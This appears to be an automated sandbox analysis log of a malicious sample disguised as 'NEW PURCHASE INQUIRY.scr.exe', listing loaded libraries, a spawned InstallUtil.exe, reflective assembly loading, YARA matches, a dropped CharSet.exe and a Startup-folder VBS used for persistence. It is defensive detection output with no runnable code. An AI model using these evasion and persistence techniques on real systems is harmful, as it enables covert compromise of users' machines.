                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6564 -s 1148
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: NEW PURCHASE INQUIRY.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: NEW PURCHASE INQUIRY.scr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdby source: InstallUtil.exe, 00000002.00000002.3286585840.0000000005520000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: InstallUtil.exe, 00000002.00000002.3286585840.0000000005520000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: InstallUtil.exe, 00000002.00000002.3286585840.0000000005520000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: InstallUtil.exe, 00000002.00000002.3281415391.0000000001024000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdbeT source: InstallUtil.exe, 00000002.00000002.3281415391.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.pdb! source: InstallUtil.exe, 00000002.00000002.3281415391.0000000001024000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ?"oC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 00000002.00000002.3281275095.0000000000B98000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: @"o.pdb source: InstallUtil.exe, 00000002.00000002.3281275095.0000000000B98000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2204307012.0000000006B00000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: ((.pdb source: InstallUtil.exe, 00000002.00000002.3281275095.0000000000B98000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000002.00000002.3281415391.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2204307012.0000000006B00000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.pdbI source: InstallUtil.exe, 00000002.00000002.3281415391.0000000001024000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.30319\InstallUtil.pdbX(R source: InstallUtil.exe, 00000002.00000002.3281275095.0000000000B98000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2203921004.0000000006A80000.00000004.08000000.00040000.00000000.sdmp, NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2190175430.000000000466E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 00000002.00000002.3281415391.0000000001024000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2203921004.0000000006A80000.00000004.08000000.00040000.00000000.sdmp, NEW PURCHASE INQUIRY.scr.exe, 00000000.00000002.2190175430.000000000466E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\System.pdb source: InstallUtil.exe, 00000002.00000002.3281415391.0000000001024000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbh source: InstallUtil.exe, 00000002.00000002.3281415391.0000000001024000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: o8C:\Windows\InstallUtil.pdb= source: InstallUtil.exe, 00000002.00000002.3281275095.0000000000B98000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdb source: InstallUtil.exe, 00000002.00000002.3281415391.0000000001024000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\InstallUtil.pdbb source: InstallUtil.exe, 00000002.00000002.3281415391.0000000001024000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: InstallUtil.exe, 00000002.00000002.3281415391.0000000001024000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: InstallUtil.pdbt source: InstallUtil.exe, 00000002.00000002.3281415391.0000000001024000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdb source: InstallUtil.exe, 00000002.00000002.3286585840.0000000005520000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: InstallUtil.pdb.NETFrameworkv4.0.30319InstallUtil.exe source: InstallUtil.exe, 00000002.00000002.3286585840.0000000005520000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000002.00000002.3281275095.0000000000B98000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb"- source: InstallUtil.exe, 00000002.00000002.3281415391.0000000001024000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: InstallUtil.exe, 00000002.00000002.3281415391.0000000001024000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000002.00000002.3281415391.0000000001024000.00000004.00000020.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Source: 2.2.InstallUtil.exe.5480000.6.raw.unpack, K10o3rBccZMwxgHKJGF.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: NEW PURCHASE INQUIRY.scr.exe, Ydyytyjl.cs.Net Code: Bnpnvs System.Reflection.Assembly.Load(byte[])
                      Source: CharSet.exe.0.dr, Ydyytyjl.cs.Net Code: Bnpnvs System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.NEW PURCHASE INQUIRY.scr.exe.6b00000.11.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.NEW PURCHASE INQUIRY.scr.exe.6b00000.11.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.NEW PURCHASE INQUIRY.scr.exe.6b00000.11.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                      Source: 0.2.NEW PURCHASE INQUIRY.scr.exe.6a80000.10.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.NEW PURCHASE INQUIRY.scr.exe.6a80000.10.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.NEW PURCHASE INQUIRY.scr.exe.6a80000.10.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.NEW PURCHASE INQUIRY.scr.exe.6a80000.10.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.NEW PURCHASE INQUIRY.scr.exe.6a80000.10.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: 0.2.NEW PURCHASE INQUIRY.scr.exe.473efa8.6.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.NEW PURCHASE INQUIRY.scr.exe.473efa8.6.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.NEW PURCHASE INQUIRY.scr.exe.473efa8.6.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.NEW PURCHASE INQUIRY.scr.exe.473efa8.6.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.NEW PURCHASE INQUIRY.scr.exe.473efa8.6.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: Yara matchFile source: 0.2.NEW PURCHASE INQUIRY.scr.exe.466e368.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.NEW PURCHASE INQUIRY.scr.exe.6950000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.NEW PURCHASE INQUIRY.scr.exe.6950000.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.NEW PURCHASE INQUIRY.scr.exe.466e368.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.NEW PURCHASE INQUIRY.scr.exe.3ff7dc8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.NEW PURCHASE INQUIRY.scr.exe.3ea85a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2203400840.0000000006950000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2180881403.0000000002C4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2190175430.000000000466E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2190175430.0000000003D17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: NEW PURCHASE INQUIRY.scr.exe PID: 7156, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6564, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_01222BB0 push eax; iretd 0_2_01222BB1
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_012205D8 push eax; ret 0_2_01220612
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_01220628 push eax; ret 0_2_01220632
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_01220638 push eax; ret 0_2_01220642
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_01220618 push eax; ret 0_2_01220622
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_01225EF9 pushfd ; iretd 0_2_01225EFF
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_05BD6992 pushfd ; retf 0_2_05BD6999
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_067EAFB1 pushfd ; retf 0_2_067EAFBD
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_067E7247 pushfd ; retf 0_2_067E7251
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_067E495E push edx; iretd 0_2_067E495F
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_067E01F8 pushad ; ret 0_2_067E0205
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_068332AB push es; ret 0_2_06833330
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_0683323B push es; retf 0_2_0683323C
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_0693BCC1 pushad ; retf 0_2_0693BCCD
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_0693D3D9 push eax; iretd 0_2_0693D3E5
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_06936891 push es; ret 0_2_069368A0
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_069466E5 push es; iretd 0_2_069466E8
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_06944781 push es; retf 0_2_069447A8
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_06944731 push es; retf 0_2_069447A8
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_0694143A push es; retf 0_2_0694143C
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_0694951D push es; retf 9490h0_2_0694952C
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_06949508 push es; retf 0_2_0694951C
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_06948536 push es; iretd 0_2_06948538
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_069412DD push es; retf 0_2_06941338
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_0694AB7A push es; iretd 0_2_0694AB9C
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_06A776B8 pushad ; retf 0_2_06A776B9
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_06A704E5 push edi; ret 0_2_06A704E6
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_06A74087 push es; ret 0_2_06A740C0
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_06A73F77 push es; iretd 0_2_06A74084
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_06A73F59 push es; ret 0_2_06A73F60
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeCode function: 0_2_06A73B7B push ss; retn 0027h0_2_06A73B8F
                      Source: 0.2.NEW PURCHASE INQUIRY.scr.exe.6660000.7.raw.unpack, WGoP5tltOBk8PKxRhDn.csHigh entropy of concatenated method names: 'ekqlTNCWT9', 'nOHlMKkn1M', 'V2xl6Z7JdF', 'Xj9lyRT8ts', 'Xxel7SuYS7', 'IeAlevSUJ1', 'CEXlxcpBjb', 'd5ilgKYJ1Y', 'otJlmUZ76r', 'YOplrVkTsx'
                      Source: 2.2.InstallUtil.exe.5480000.6.raw.unpack, Kn1f2rV0FJLyKMwbo2A.csHigh entropy of concatenated method names: 'AfMVNawgty', 'DvtVHu7ruO', 'WYpVRCDc1R', 'l8lVrefjKq', 'yJZV90qsPr', 'ihZVdFCICj', 'yulVx8gO5F', 'uj3VJ4fGt0', 'CbNVWFoVHl', 'XlRVLXgost'
                      Source: 2.2.InstallUtil.exe.5480000.6.raw.unpack, K10o3rBccZMwxgHKJGF.csHigh entropy of concatenated method names: 'IK8gg3ZHVYEO8BQ9M6H', 'YbdPoiZRf33R7ZPpj5V', 'Kmsn58sWUb', 'vh0ry9Sq2v', 'dkEnsaj1hl', 'HGLnIYE8Ow', 'IYdnX2RN4L', 'QJjn4m9O7Q', 'd3cuHOgVju', 'I3GBBbX51V'
                      Source: 2.2.InstallUtil.exe.5480000.6.raw.unpack, S4IFWZVgMZUZAZkVQPi.csHigh entropy of concatenated method names: 'O2gRHrx4D3', 'SqURR5pTOM', 'Ps7Rrr1Qua', 'CZpR9ZDCN9', 'duiRdeb6wP', 'yh7Rxfs6vF', 'Wq8RJluNy9', 'JXOV4XgQnF', 'ycSRWXbcCG', 'w3uRL2PpCQ'
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeFile created: C:\Users\user\AppData\Roaming\CharSet.exeJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CharSet.vbsJump to dropped file
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CharSet.vbsJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CharSet.vbsJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
